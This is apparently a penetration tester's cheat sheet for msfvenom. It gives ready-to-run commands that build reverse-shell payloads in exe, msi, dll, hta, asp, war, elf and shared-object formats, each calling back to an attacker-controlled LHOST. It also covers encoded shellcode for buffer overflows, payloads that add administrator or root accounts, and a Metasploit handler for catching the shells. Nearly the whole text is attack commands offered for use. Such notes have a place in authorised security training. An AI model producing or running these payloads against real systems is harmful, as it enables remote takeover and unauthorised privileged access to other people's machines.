Msfvenom

List payloads and formats

msfvenom --list payload
msfvenom --list format

Most used payloads

Windows - x86 - exe

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe

Windows - x64 - exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.233 LPORT=21 -f exe -o binary.exe

Windows - x64 - .msi

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

Windows - .dll

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.184 LPORT=445

Windows - .hta

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.138 LPORT=4444 -f hta-psh -o evil.hta

Windows - .asp

Useful when the web server is Microsoft IIS. The .aspx and .aspx-exe formats are also worth trying.

msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.10.16.8 LPORT=4444 -o reverse-shell.asp

.war (java/jsp)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=80 -f war > shell.war

Linux - x86 - elf

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.151 LPORT=80 -f elf -o shell.elf

Linux - x64 - elf-so

msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=192.168.130.21 LPORT=80

For buffer overflows

Windows - .c

The -b flag lists the bad characters the encoded shellcode must avoid, and the -e flag selects the encoder (here x86/alpha_mixed).

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.218 LPORT=80 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -f c -e x86/alpha_mixed

Other payloads

cmd/windows/adduser # Create a new user and add it to the local Administrators group
linux/x86/adduser   # Create a new user with UID 0
windows/adduser     # Create a new user and add it to the local Administrators group

Handlers for staged payloads

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp # change to match the staged payload that was generated
set LPORT <port>
set LHOST <ip>
exploit -j # run the handler as a background job